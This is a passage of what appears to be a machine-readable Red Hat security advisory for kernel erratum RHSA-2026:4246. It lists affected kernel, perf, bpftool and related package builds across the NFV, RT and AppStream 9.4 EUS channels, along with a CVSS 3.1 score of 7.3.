"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
